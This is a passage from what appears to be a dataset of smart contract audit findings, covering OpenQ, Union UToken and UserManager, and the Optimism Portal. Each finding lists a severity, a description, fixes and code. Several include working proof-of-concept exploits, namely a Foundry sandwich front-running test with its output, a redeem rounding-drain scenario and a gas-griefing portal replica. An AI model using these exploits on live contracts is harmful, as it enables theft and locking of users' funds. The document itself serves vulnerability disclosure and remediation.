newInvoiceComplete;\\n\\n for (uint256 i = 0; i < supportingDocumentsComplete.length; i++) { <=====================================================\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n }\\n```\\n\\nThe same issue exists on TieredPercentageBounty too.",```\\n for (uint256 i = 0; i < newTierWinners.length; i++) {\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < newInvoiceComplete.length; i++) {\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < newSupportingDocumentsCompleted.length; i++) {\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n```\\n\\nNote this won't work if increasing the number of items compared to previous state must also be supported. In that case you must use the length of the smallest of the two arrays in each for loop.,Unable to resize the payout schedule to less items than the previous state.,"```\\nfunction setPayoutScheduleFixed(\\n uint256[] calldata _payoutSchedule,\\n address _payoutTokenAddress\\n ) external onlyOpenQ {\\n require(\\n bountyType == OpenQDefinitions.TIERED_FIXED,\\n Errors.NOT_A_FIXED_TIERED_BOUNTY\\n );\\n payoutSchedule = _payoutSchedule;\\n payoutTokenAddress = _payoutTokenAddress;\\n\\n // Resize metadata arrays and copy current members to new array\\n // NOTE: If resizing to fewer tiers than previously, the final indexes will be removed\\n string[] memory newTierWinners = new string[](payoutSchedule.length);\\n bool[] memory newInvoiceComplete = new bool[](payoutSchedule.length);\\n bool[] memory newSupportingDocumentsCompleted = new bool[](\\n payoutSchedule.length\\n );\\n\\n for (uint256 i = 0; i < tierWinners.length; i++) { <=====================================================\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < invoiceComplete.length; i++) { <=====================================================\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < supportingDocumentsComplete.length; i++) { <=====================================================\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n }\\n```\\n" +The `exchangeRateStored()` function allows front-running on repayments,medium,"The `exchangeRateStored()` function allows to perform front-running attacks when a repayment is being executed.\\nSince `_repayBorrowFresh()` increases `totalRedeemable` value which affects in the final exchange rate calculation used in functions such as `mint()` and `redeem()`, an attacker could perform a front-run to any repayment by minting `UTokens` beforehand, and redeem these tokens after the front-run repayment. In this situation, the attacker would always be obtaining profits since `totalRedeemable` value is increased after every repayment.\\nProof of Concept\\n```\\n function increaseTotalSupply(uint256 _amount) private {\\n daiMock.mint(address(this), _amount);\\n daiMock.approve(address(uToken), _amount);\\n uToken.mint(_amount);\\n }\\n\\n function testMintRedeemSandwich() public {\\n increaseTotalSupply(50 ether);\\n\\n vm.prank(ALICE);\\n uToken.borrow(ALICE, 50 ether);\\n uint256 borrowed = uToken.borrowBalanceView(ALICE);\\n\\n vm.roll(block.number + 500);\\n\\n vm.startPrank(BOB);\\n daiMock.approve(address(uToken), 100 ether);\\n uToken.mint(100 ether);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] BOB balance:"", uToken.balanceOf(BOB));\\n console.log(""[DAI] BOB balance:"", daiMock.balanceOf(BOB));\\n\\n uint256 currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[1] Exchange rate:"", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(ALICE);\\n uint256 interest = uToken.calculatingInterest(ALICE);\\n uint256 repayAmount = borrowed + interest;\\n\\n daiMock.approve(address(uToken), repayAmount);\\n uToken.repayBorrow(ALICE, repayAmount);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] ALICE balance:"", uToken.balanceOf(ALICE));\\n console.log(""[DAI] ALICE balance:"", daiMock.balanceOf(ALICE));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[2] Exchange rate:"", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(BOB);\\n uToken.redeem(uToken.balanceOf(BOB), 0);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] BOB balance:"", uToken.balanceOf(BOB));\\n console.log(""[DAI] BOB balance:"", daiMock.balanceOf(BOB));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[3] Exchange rate:"", currExchangeRate);\\n }\\n```\\n\\nResult\\n```\\n[PASS] testMintRedeemSandwich() (gas: 560119)\\nLogs:\\n\\n [UToken] Total supply: 150000000000000000000\\n [UToken] BOB balance: 100000000000000000000\\n [DAI] BOB balance: 0\\n [1] Exchange rate: 1000000000000000000\\n\\n [UToken] Total supply: 150000000000000000000\\n [UToken] ALICE balance: 0\\n [DAI] ALICE balance: 99474750000000000000\\n [2] Exchange rate: 1000084166666666666\\n\\n [UToken] Total supply: 50000000000000000000\\n [UToken] BOB balance: 0\\n [DAI] BOB balance: 100008416666666666600\\n [3] Exchange rate: 1000084166666666668\\n```\\n",Issue The `exchangeRateStored()` function allows front-running on repayments\\nAn approach could be implementing TWAP in order to make front-running unprofitable in this situation.,An attacker could always get profits from front-running repayments by taking advantage of `exchangeRateStored()` calculation before a repayment is made.,"```\\n function increaseTotalSupply(uint256 _amount) private {\\n daiMock.mint(address(this), _amount);\\n daiMock.approve(address(uToken), _amount);\\n uToken.mint(_amount);\\n }\\n\\n function testMintRedeemSandwich() public {\\n increaseTotalSupply(50 ether);\\n\\n vm.prank(ALICE);\\n uToken.borrow(ALICE, 50 ether);\\n uint256 borrowed = uToken.borrowBalanceView(ALICE);\\n\\n vm.roll(block.number + 500);\\n\\n vm.startPrank(BOB);\\n daiMock.approve(address(uToken), 100 ether);\\n uToken.mint(100 ether);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] BOB balance:"", uToken.balanceOf(BOB));\\n console.log(""[DAI] BOB balance:"", daiMock.balanceOf(BOB));\\n\\n uint256 currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[1] Exchange rate:"", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(ALICE);\\n uint256 interest = uToken.calculatingInterest(ALICE);\\n uint256 repayAmount = borrowed + interest;\\n\\n daiMock.approve(address(uToken), repayAmount);\\n uToken.repayBorrow(ALICE, repayAmount);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] ALICE balance:"", uToken.balanceOf(ALICE));\\n console.log(""[DAI] ALICE balance:"", daiMock.balanceOf(ALICE));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[2] Exchange rate:"", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(BOB);\\n uToken.redeem(uToken.balanceOf(BOB), 0);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] BOB balance:"", uToken.balanceOf(BOB));\\n console.log(""[DAI] BOB balance:"", daiMock.balanceOf(BOB));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[3] Exchange rate:"", currExchangeRate);\\n }\\n```\\n" +Users can lose their staking rewards.,medium,"By following the steps described in `Vulnerability Detail`, user is able to lose all of his staking rewards.\\nThe issue occurs in the following steps described below:\\nKiki calls the function `unstake` and unstakes all of his funds, as a result the internal function `_updateStakedCoinAge` is called to update his staked coin age till the current block.\\n```\\ncontracts/user/UserManager.sol\\n\\n function unstake(uint96 amount) external whenNotPaused nonReentrant {\\n Staker storage staker = stakers[msg.sender];\\n // Stakers can only unstaked stake balance that is unlocked. Stake balance\\n // becomes locked when it is used to underwrite a borrow.\\n if (staker.stakedAmount - staker.locked < amount) revert InsufficientBalance();\\n comptroller.withdrawRewards(msg.sender, stakingToken);\\n uint256 remaining = IAssetManager(assetManager).withdraw(stakingToken, msg.sender, amount);\\n if (uint96(remaining) > amount) {\\n revert AssetManagerWithdrawFailed();\\n }\\n uint96 actualAmount = amount - uint96(remaining);\\n _updateStakedCoinAge(msg.sender, staker);\\n staker.stakedAmount -= actualAmount;\\n totalStaked -= actualAmount;\\n emit LogUnstake(msg.sender, actualAmount);\\n }\\n```\\n\\n```\\ncontracts/user/UserManager.sol\\n\\n function _updateStakedCoinAge(address stakerAddress, Staker storage staker) private {\\n uint64 currentBlock = uint64(block.number);\\n uint256 lastWithdrawRewards = getLastWithdrawRewards[stakerAddress];\\n uint256 blocksPast = (uint256(currentBlock) - _max(lastWithdrawRewards, uint256(staker.lastUpdated)));\\n staker.stakedCoinAge += blocksPast * uint256(staker.stakedAmount);\\n staker.lastUpdated = currentBlock;\\n }\\n```\\n\\nAfter that Kiki calls the function `withdrawRewards` in order to withdraw his staking rewards. Everything executes fine, but the contract lacks union tokens and can't transfer the tokens to Kiki, so the else statement is triggered and the amount of tokens is added to his accrued balance, so he can still be able to withdraw them after.\\n```\\ncontracts/token/Comptroller.sol\\n\\n function withdrawRewards(address account, address token) external override whenNotPaused returns (uint256) {\\n IUserManager userManager = _getUserManager(token);\\n // Lookup account state from UserManager\\n (UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n // Lookup global state from UserManager\\n uint256 globalTotalStaked = userManager.globalTotalStaked();\\n uint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n // update the global states\\n gInflationIndex = _getInflationIndexNew(globalTotalStaked, block.number - gLastUpdatedBlock);\\n gLastUpdatedBlock = block.number;\\n users[account][token].updatedBlock = block.number;\\n users[account][token].inflationIndex = gInflationIndex;\\n if (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n return 0;\\n }\\n }\\n```\\n\\nThis is where the issue occurs, next time Kiki calls the function `withdrawRewards`, he is going to lose all of his rewards.\\nExplanation of how this happens:\\nFirst the internal function _getUserInfo will return the struct `UserManagerAccountState memory user`, which contains zero amount for effectiveStaked, because Kiki unstaked all of his funds and already called the function withdrawRewards once. This happens because Kiki has `stakedAmount = 0, stakedCoinAge = 0, lockedCoinAge = 0, frozenCoinAge = 0`.\\n```\\n(UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n```\\n\\nThe cache `uint256 amount` will have a zero value because of the if statement applied in the internal function `_calculateRewardsByBlocks`, the if statement will be triggered as Kiki's effectiveStaked == 0, and as a result the function will return zero.\\n```\\nuint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n```\\n\\n```\\nif (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n```\\n\\nSince the cache `uint256 amount` have a zero value, the if statement in the function `withdrawRewards` will actually be ignored because of `&& amount > 0`. And the else statement will be triggered, which will override Kiki's accrued balance with ""amount"", which is actually zero. As a result Kiki will lose his rewards.\\n```\\nif (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n\\n return 0;\\n }\\n```\\n","One way of fixing this problem, that l can think of is to refactor the function _calculateRewardsByBlocks. First the function _calculateRewardsByBlocks will revert if `(totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0)`. Second new if statement is created, which is triggered if `user.effectiveStaked == 0`.\\nif `userInfo.accrued == 0`, it will return 0.\\nif `userInfo.accrued != 0`, it will return the accrued balance.\\n```\\nfunction _calculateRewardsByBlocks(\\n address account,\\n address token,\\n uint256 pastBlocks,\\n Info memory userInfo,\\n uint256 totalStaked,\\n UserManagerAccountState memory user\\n ) internal view returns (uint256) {\\n uint256 startInflationIndex = users[account][token].inflationIndex;\\n\\n if (totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n revert ZeroNotAllowed();\\n }\\n \\n if (user.effectiveStaked == 0) {\\n if (userInfo.accrued == 0) return 0;\\n else return userInfo.accrued\\n }\\n\\n uint256 rewardMultiplier = _getRewardsMultiplier(user);\\n\\n uint256 curInflationIndex = _getInflationIndexNew(totalStaked, pastBlocks);\\n\\n if (curInflationIndex < startInflationIndex) revert InflationIndexTooSmall();\\n\\n return\\n userInfo.accrued +\\n (curInflationIndex - startInflationIndex).wadMul(user.effectiveStaked).wadMul(rewardMultiplier);\\n }\\n```\\n","The impact here is that users can lose their staking rewards.\\nTo understand the scenario which is described in `Vulnerability Detail`, you'll need to know how the codebase works. Here in the impact section, l will describe in little more details and trace the functions.\\nThe issue occurs in 3 steps like described in Vulnerability Detail:\\nUser unstakes all of his funds.\\nThen he calls the function `withdrawRewards` in order to withdraw his rewards, everything executes fine but the contract lacks union tokens, so instead of transferring the tokens to the user, they are added to his accrued balance so he can still withdraw them after.\\nThe next time the user calls the function `withdrawRewards` in order to withdraw his accrued balance of tokens, he will lose all of his rewards.\\nExplanation in details:\\nUser unstakes all of his funds by calling the function `unstake`.\\nHis stakedAmount will be reduced to zero in the struct `Staker`.\\nHis stakedCoinAge will be updated to the current block with the internal function `_updateStakedCoinAge`.\\nThen he calls the function withdrawRewards in order to withdraw his rewards, everything executes fine but the contract lacks union tokens, so instead of transferring the tokens to the user, they are added to his accrued balance so he can still withdraw them after.\\nUser's stakedCoinAge, lockedCoinAge and frozenCoinAge are reduced to zero in the function `onWithdrawRewards`.\\nThe next time the user calls the function `withdrawRewards` in order to withdraw his accrued balance of tokens, he will lose all of his rewards.\\nIn order to withdraw his accrued rewards stored in his struct balance `Info`. He calls the function `withdrawRewards` again and this is where the issue occurs, as the user has `stakedAmount = 0, stakedCoinAge = 0, lockedCoinAge = 0, frozenCoinAge = 0` .\\nDuo to that the outcome of the function _getCoinAge, which returns a memory struct of CoinAge to the function `_getEffectiveAmounts` will look like this:\\n```\\nCoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: lastWithdrawRewards,\\n diff: diff,\\n stakedCoinAge: staker.stakedCoinAge + diff * uint256(staker.stakedAmount),\\n lockedCoinAge: staker.lockedCoinAge,\\n frozenCoinAge: frozenCoinAge[stakerAddress]\\n });\\n\\n// The function will return:\\nCoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: random number,\\n diff: random number,\\n stakedCoinAge: 0 + random number * 0,\\n lockedCoinAge: 0, \\n frozenCoinAge: 0\\n });\\n```\\n\\nAs a result the function `_getEffectiveAmounts` will return zero values for effectiveStaked and effectiveLocked to the function `onWithdrawRewards`.\\n```\\nreturn (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.stakedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.lockedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n memberTotalFrozen\\n );\\n\\nreturn (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (0 - 0) / random number,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (0 - 0) / random number,\\n 0\\n );\\n```\\n\\nAfter that the function `withdrawRewards` caches the returning value from the internal function `_calculateRewardsByBlocks`. What happens is that in the function `_calculateRewardsByBlocks` the if statement is triggered because the user's effectiveStaked == 0. As a result the internal function will return 0 and the cache `uint256 amount` will equal zero.\\n```\\nuint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n```\\n\\n```\\nif (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n```\\n\\nSince the cache `uint256 amount` have a zero value, the if statement in the function `withdrawRewards` will actually be ignored because of `&& amount > 0`. And the else statement will be triggered, which will override Kiki's accrued balance with ""amount"", which is actually zero.\\n```\\nif (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n\\n return 0;\\n }\\n```\\n\\nBelow you can see the functions which are invoked starting from the function _getUserInfo:\\n```\\n(UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n```\\n\\n```\\nfunction _getUserInfo(\\n IUserManager userManager,\\n address account,\\n address token,\\n uint256 futureBlocks\\n ) internal returns (UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) {\\n userInfo = users[account][token];\\n uint256 lastUpdatedBlock = userInfo.updatedBlock;\\n if (block.number < lastUpdatedBlock) {\\n lastUpdatedBlock = block.number;\\n }\\n\\n pastBlocks = block.number - lastUpdatedBlock + futureBlocks;\\n\\n (user.effectiveStaked, user.effectiveLocked, user.isMember) = userManager.onWithdrawRewards(\\n account,\\n pastBlocks\\n );\\n }\\n```\\n\\n```\\nfunction onWithdrawRewards(address staker, uint256 pastBlocks)\\n external\\n returns (\\n uint256 effectiveStaked,\\n uint256 effectiveLocked,\\n bool isMember\\n )\\n {\\n if (address(comptroller) != msg.sender) revert AuthFailed();\\n uint256 memberTotalFrozen = 0;\\n (effectiveStaked, effectiveLocked, memberTotalFrozen) = _getEffectiveAmounts(staker, pastBlocks);\\n stakers[staker].stakedCoinAge = 0;\\n stakers[staker].lastUpdated = uint64(block.number);\\n stakers[staker].lockedCoinAge = 0;\\n frozenCoinAge[staker] = 0;\\n getLastWithdrawRewards[staker] = block.number;\\n\\n uint256 memberFrozenBefore = memberFrozen[staker];\\n if (memberFrozenBefore != memberTotalFrozen) {\\n memberFrozen[staker] = memberTotalFrozen;\\n totalFrozen = totalFrozen - memberFrozenBefore + memberTotalFrozen;\\n }\\n\\n isMember = stakers[staker].isMember;\\n }\\n```\\n\\n```\\nfunction _getEffectiveAmounts(address stakerAddress, uint256 pastBlocks)\\n private\\n view\\n returns (\\n uint256,\\n uint256,\\n uint256\\n )\\n {\\n uint256 memberTotalFrozen = 0;\\n CoinAge memory coinAge = _getCoinAge(stakerAddress);\\n\\n uint256 overdueBlocks = uToken.overdueBlocks();\\n uint256 voucheesLength = vouchees[stakerAddress].length;\\n // Loop through all of the stakers vouchees sum their total\\n // locked balance and sum their total currDefaultFrozenCoinAge\\n for (uint256 i = 0; i < voucheesLength; i++) {\\n // Get the vouchee record and look up the borrowers voucher record\\n // to get the locked amount and lastUpdated block number\\n Vouchee memory vouchee = vouchees[stakerAddress][i];\\n Vouch memory vouch = vouchers[vouchee.borrower][vouchee.voucherIndex];\\n\\n uint256 lastRepay = uToken.getLastRepay(vouchee.borrower);\\n uint256 repayDiff = block.number - _max(lastRepay, coinAge.lastWithdrawRewards);\\n uint256 locked = uint256(vouch.locked);\\n\\n if (overdueBlocks < repayDiff && (coinAge.lastWithdrawRewards != 0 || lastRepay != 0)) {\\n memberTotalFrozen += locked;\\n if (pastBlocks >= repayDiff) {\\n coinAge.frozenCoinAge += (locked * repayDiff);\\n } else {\\n coinAge.frozenCoinAge += (locked * pastBlocks);\\n }\\n }\\n\\n uint256 lastUpdateBlock = _max(coinAge.lastWithdrawRewards, uint256(vouch.lastUpdated));\\n coinAge.lockedCoinAge += (block.number - lastUpdateBlock) * locked;\\n }\\n\\n return (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.stakedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.lockedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n memberTotalFrozen\\n );\\n }\\n```\\n\\n```\\nfunction _getCoinAge(address stakerAddress) private view returns (CoinAge memory) {\\n Staker memory staker = stakers[stakerAddress];\\n\\n uint256 lastWithdrawRewards = getLastWithdrawRewards[stakerAddress];\\n uint256 diff = block.number - _max(lastWithdrawRewards, uint256(staker.lastUpdated));\\n\\n CoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: lastWithdrawRewards,\\n diff: diff,\\n stakedCoinAge: staker.stakedCoinAge + diff * uint256(staker.stakedAmount),\\n lockedCoinAge: staker.lockedCoinAge,\\n frozenCoinAge: frozenCoinAge[stakerAddress]\\n });\\n\\n return coinAge;\\n }\\n```\\n\\nBelow you can see the function _calculateRewardsByBlocks:\\n```\\nfunction _calculateRewardsByBlocks(\\n address account,\\n address token,\\n uint256 pastBlocks,\\n Info memory userInfo,\\n uint256 totalStaked,\\n UserManagerAccountState memory user\\n ) internal view returns (uint256) {\\n uint256 startInflationIndex = users[account][token].inflationIndex;\\n\\n if (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n\\n uint256 rewardMultiplier = _getRewardsMultiplier(user);\\n\\n uint256 curInflationIndex = _getInflationIndexNew(totalStaked, pastBlocks);\\n\\n if (curInflationIndex < startInflationIndex) revert InflationIndexTooSmall();\\n\\n return\\n userInfo.accrued +\\n (curInflationIndex - startInflationIndex).wadMul(user.effectiveStaked).wadMul(rewardMultiplier);\\n }\\n```\\n","```\\ncontracts/user/UserManager.sol\\n\\n function unstake(uint96 amount) external whenNotPaused nonReentrant {\\n Staker storage staker = stakers[msg.sender];\\n // Stakers can only unstaked stake balance that is unlocked. Stake balance\\n // becomes locked when it is used to underwrite a borrow.\\n if (staker.stakedAmount - staker.locked < amount) revert InsufficientBalance();\\n comptroller.withdrawRewards(msg.sender, stakingToken);\\n uint256 remaining = IAssetManager(assetManager).withdraw(stakingToken, msg.sender, amount);\\n if (uint96(remaining) > amount) {\\n revert AssetManagerWithdrawFailed();\\n }\\n uint96 actualAmount = amount - uint96(remaining);\\n _updateStakedCoinAge(msg.sender, staker);\\n staker.stakedAmount -= actualAmount;\\n totalStaked -= actualAmount;\\n emit LogUnstake(msg.sender, actualAmount);\\n }\\n```\\n" +Attackers can call UToken.redeem() and drain the funds in assetManager,medium,"Attackers can call `UToken.redeem()` and drain the funds in assetManager, taking advantage of the following vulnerability: due to round error, it is possible that uTokenAmount = 0; the redeem()function does not check whether `uTokenAmount = 0` and will redeem the amount of `underlyingAmount` even when zero uTokens are burned.\\nConsider the following attack scenario:\\nSuppose `exchangeRate = 1000 WAD`, that is each utoken exchanges for 1000 underlying tokens.\\nAttacker B calls `redeem(0, 999)`, then the else-part of the following code will get executed:\\n```\\n if (amountIn > 0) {\\n // We calculate the exchange rate and the amount of underlying to be redeemed:\\n // uTokenAmount = amountIn\\n // underlyingAmount = amountIn x exchangeRateCurrent\\n uTokenAmount = amountIn;\\n underlyingAmount = (amountIn * exchangeRate) / WAD;\\n } else {\\n // We get the current exchange rate and calculate the amount to be redeemed:\\n // uTokenAmount = amountOut / exchangeRate\\n // underlyingAmount = amountOut\\n uTokenAmount = (amountOut * WAD) / exchangeRate;\\n underlyingAmount = amountOut;\\n }\\n```\\n\\nwe have `uTokenAmount = 999*WAD/1000WAD = 0`, and `underlyingAmount = 999`.\\nSince `redeeem()` does not check whether `uTokenAmount = 0` and the function will proceed. When finished, the attacker will get 999 underlying tokens, but burned no utokens. He stole 999 underlying tokens.\\nThe attacker can accomplish draining the `assetManger` by writing a malicious contract/function using a loop to run `redeem(0, exchangeRate/WAD-1)` multiple times (as long as not running of gas) and will be able to steal more funds in one SINGLE transaction. Running this transaction a few times will drain `assetManager` easily. This attack will be successful when `exchangeRate/WAD-1 > 0`. Here we need to consider that `exchangeRate` might change due to the decreasing of `totalReeemable`. So in each iteration, when we call `redeem(0, exchangeRate/WAD-1)`, the second argument is recalculated.",Issue Attackers can call UToken.redeem() and drain the funds in assetManager\\nRevise `redeem()` so that it will revert when `uTokenAmount = 0`.,An attacker can keep calling redeem() and drain the funds in `assetManager`.,```\\n if (amountIn > 0) {\\n // We calculate the exchange rate and the amount of underlying to be redeemed:\\n // uTokenAmount = amountIn\\n // underlyingAmount = amountIn x exchangeRateCurrent\\n uTokenAmount = amountIn;\\n underlyingAmount = (amountIn * exchangeRate) / WAD;\\n } else {\\n // We get the current exchange rate and calculate the amount to be redeemed:\\n // uTokenAmount = amountOut / exchangeRate\\n // underlyingAmount = amountOut\\n uTokenAmount = (amountOut * WAD) / exchangeRate;\\n underlyingAmount = amountOut;\\n }\\n```\\n +"Malicious user can finalize other's withdrawal with less than specified gas limit, leading to loss of funds",high,"Transactions to execute a withdrawal from the Optimism Portal can be sent with 5122 less gas than specified by the user, because the check is performed a few operations prior to the call. Because there are no replays on this contract, the result is that a separate malicious user can call `finalizeWithdrawalTransaction()` with a precise amount of gas, cause the withdrawer's withdrawal to fail, and permanently lock their funds.\\nWithdrawals can be initiated directly from the `L2ToL1MessagePasser` contract on L2. These withdrawals can be withdrawn directly from the `OptimismPortal` on L1. This path is intended to be used only by users who know what they are doing, presumably to save the gas of going through the additional more “user-friendly” contracts.\\nOne of the quirks of the `OptimismPortal` is that there is no replaying of transactions. If a transaction fails, it will simply fail, and all ETH associated with it will remain in the `OptimismPortal` contract. Users have been warned of this and understand the risks, so Optimism takes no responsibility for user error.\\nHowever, there is an issue in the implementation of `OptimismPortal` that a withdrawal transaction can be executed with 5122 gas less than the user specified. In many cases, this could cause their transaction to revert, without any user error involved. Optimism is aware of the importance of this property being correct when they write in the comments:\\nWe want to maintain the property that the amount of gas supplied to the call to the target contract is at least the gas limit specified by the user. We can do this by enforcing that, at this point in time, we still have gaslimit + buffer gas available.\\nThis property is not maintained because of the gap between the check and the execution.\\nThe check is as follows, where FINALIZE_GAS_BUFFER == 20_000:\\n```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n\\nAfter this check, we know that the current execution context has at least 20,000 more gas than the gas limit. However, we then proceed to spend gas by (a) assigning the `l2Sender` storage variable, which uses 2900 gas because it's assigning from a non-zero value, and (b) perform some additional operations to prepare the contract for the external call.\\nThe result is that, by the time the call is sent with `gasleft()` - FINALIZE_GAS_BUFFER gas, `gasleft()` is 5122 lower than it was in the initial check.\\nMathematically, this can be expressed as:\\n`gasAtCheck >= gasLimit + 20000`\\n`gasSent == gasAtCall - 20000`\\n`gasAtCall == gasAtCheck - 5122`\\nRearranging, we get `gasSent >= gasLimit + 20000 - 5122 - 20000`, which simplifies to `gasSent >= gasLimit - 5122`.","Instead of using one value for `FINALIZE_GAS_BUFFER`, two separate values should be used that account for the gas used between the check and the call.","For any withdrawal where a user sets their gas limit within 5122 of the actual gas their execution requires, a malicious user can call `finalizeWithdrawalTransaction()` on their behalf with enough gas to pass the check, but not enough for execution to succeed.\\nThe result is that the withdrawing user will have their funds permanently locked in the `OptimismPortal` contract.\\nProof of Concept\\nTo test this behavior in a sandboxed environment, you can copy the following proof of concept.\\nHere are three simple contracts that replicate the behavior of the Portal, as well as an external contract that uses a predefined amount of gas.\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nlibrary SafeCall {\\n /**\\n * @notice Perform a low level call without copying any returndata\\n *\\n * @param _target Address to call\\n * @param _gas Amount of gas to pass to the call\\n * @param _value Amount of value to pass to the call\\n * @param _calldata Calldata to pass to the call\\n */\\n function call(\\n address _target,\\n uint256 _gas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n _success := call(\\n _gas, // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 0x20), // inloc\\n mload(_calldata), // inlen\\n 0, // outloc\\n 0 // outlen\\n )\\n }\\n return _success;\\n }\\n}\\n\\ncontract GasUser {\\n uint[] public s;\\n\\n function store(uint i) public {\\n for (uint j = 0; j < i; j++) {\\n s.push(1);\\n }\\n }\\n}\\n\\ncontract Portal {\\n address l2Sender;\\n\\n struct Transaction {\\n uint gasLimit;\\n address sender;\\n address target;\\n uint value;\\n bytes data;\\n }\\n\\n constructor(address _l2Sender) {\\n l2Sender = _l2Sender;\\n }\\n\\n function execute(Transaction memory _tx) public {\\n require(\\n gasleft() >= _tx.gasLimit + 20000,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n );\\n\\n // Set the l2Sender so contracts know who triggered this withdrawal on L2.\\n l2Sender = _tx.sender;\\n\\n // Trigger the call to the target contract. We use SafeCall because we don't\\n // care about the returndata and we don't want target contracts to be able to force this\\n // call to run out of gas via a returndata bomb.\\n bool success = SafeCall.call(\\n _tx.target,\\n gasleft() - 20000,\\n _tx.value,\\n _tx.data\\n );\\n }\\n}\\n```\\n\\nHere is a Foundry test that calls the Portal with various gas values to expose this vulnerability:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../src/Portal.sol"";\\n\\ncontract PortalGasTest is Test {\\n Portal public c;\\n GasUser public gu;\\n\\n function setUp() public {\\n c = new Portal(0x000000000000000000000000000000000000dEaD);\\n gu 